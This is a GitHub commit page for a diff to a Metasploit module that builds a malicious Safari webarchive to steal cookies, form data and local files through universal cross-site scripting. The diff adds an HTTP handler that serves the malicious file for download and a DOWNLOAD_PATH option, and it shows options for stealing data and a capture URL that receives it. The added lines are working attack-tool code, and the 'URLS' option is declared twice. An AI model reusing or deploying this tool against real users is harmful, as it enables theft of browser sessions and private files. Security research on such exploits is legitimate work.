Skip to content

Commit d857b81

Browse files
author
Tod Beardsley
committed
Land rapid7#1777, usability fix for Safari module
2 parents 1d9a695 + 431cba8 commit d857b81

File tree

1 file changed

+30
-7
lines changed

1 file changed

+30
-7
lines changed

modules/auxiliary/gather/apple_safari_webarchive_uxss.rb

Lines changed: 30 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -50,6 +50,8 @@ def initialize(info = {})
5050
OptString.new('FILENAME', [ true, 'The file name.', 'msf.webarchive']),
5151
OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http//browserscan.rapid7.com/']),
5252
OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
53+
OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarhive.', '/msf.webarchive']),
54+
OptString.new('URLS', [ true, 'The URLs to steal cookie and form data from.', '']),
5355
OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
5456
OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
5557
OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),
@@ -143,7 +145,7 @@ def start_http(opts={})
143145
}.update(opts['Uri'] || {})
144146

145147
proto = (datastore["SSL"] ? "https" : "http")
146-
print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
148+
print_status("Data capture URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
147149

148150
if (opts['ServerHost'] == '0.0.0.0')
149151
print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
@@ -153,6 +155,20 @@ def start_http(opts={})
153155
@service_path = uopts['Path']
154156
@http_service.add_resource(uopts['Path'], uopts)
155157

158+
# Add path to download
159+
uopts = {
160+
'Proc' => Proc.new { |cli, req|
161+
resp = Rex::Proto::Http::Response::OK.new
162+
resp['Content-Type'] = 'application/x-webarchive'
163+
resp.body = @xml.to_s
164+
cli.send_response resp
165+
},
166+
'Path' => webarchive_download_url
167+
}.update(opts['Uri'] || {})
168+
@http_service.add_resource(webarchive_download_url, uopts)
169+
170+
print_status("Download URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
171+
156172
# As long as we have the http_service object, we will keep the ftp server alive
157173
while @http_service
158174
select(nil, nil, nil, 1)
@@ -176,9 +192,10 @@ def on_request_uri(cli, request)
176192

177193
# @return [String] contents of webarchive as an XML document
178194
def webarchive_xml
179-
xml = webarchive_header
180-
urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) }
181-
xml << webarchive_footer
195+
return @xml if not @xml.nil? # only compute xml once
196+
@xml = webarchive_header
197+
urls.each_with_index { |url, idx| @xml << webarchive_iframe(url, idx) }
198+
@xml << webarchive_footer
182199
end
183200

184201
# @return [String] the first chunk of the webarchive file, containing the WebMainResource
@@ -288,8 +305,9 @@ def webarchive_footer
288305
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
289306
# [a encodeObject:response forKey:@"WebResourceResponse"];
290307
def web_response_xml(script)
291-
# this is a binary plist, but im too lazy to write a real encoder.
292-
# ripped this straight out of a safari webarchive save.
308+
# this is a serialized NSHTTPResponse, i'm too lazy to write a
309+
# real encoder so yay lets use string interpolation.
310+
# ripped this straight out of a webarchive save
293311
script['content-length'] = script[:body].length
294312
whitelist = %w(content-type content-length date etag
295313
Last-Modified cache-control expires)
@@ -711,7 +729,7 @@ def all_script_urls(pages)
711729
end
712730
end
713731

714-
# @return [Array<Array<String>>] list of URLs for remote javascripts that are cacheable
732+
# @return [Array<Array<Hash>>] list of headers returned by cacheabke remote javascripts
715733
def find_cached_scripts
716734
cached_scripts = all_script_urls(urls).each_with_index.map do |urls_for_site, i|
717735
begin
@@ -780,6 +798,11 @@ def backend_url
780798
"#{proto}://#{myhost}#{port_str}"
781799
end
782800

801+
# @return [String] URL that serves the malicious webarchive
802+
def webarchive_download_url
803+
datastore["DOWNLOAD_PATH"]
804+
end
805+
783806
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
784807
# via the FILE_URLS module option.
785808
def interesting_file_urls

0 commit comments

Comments
 (0)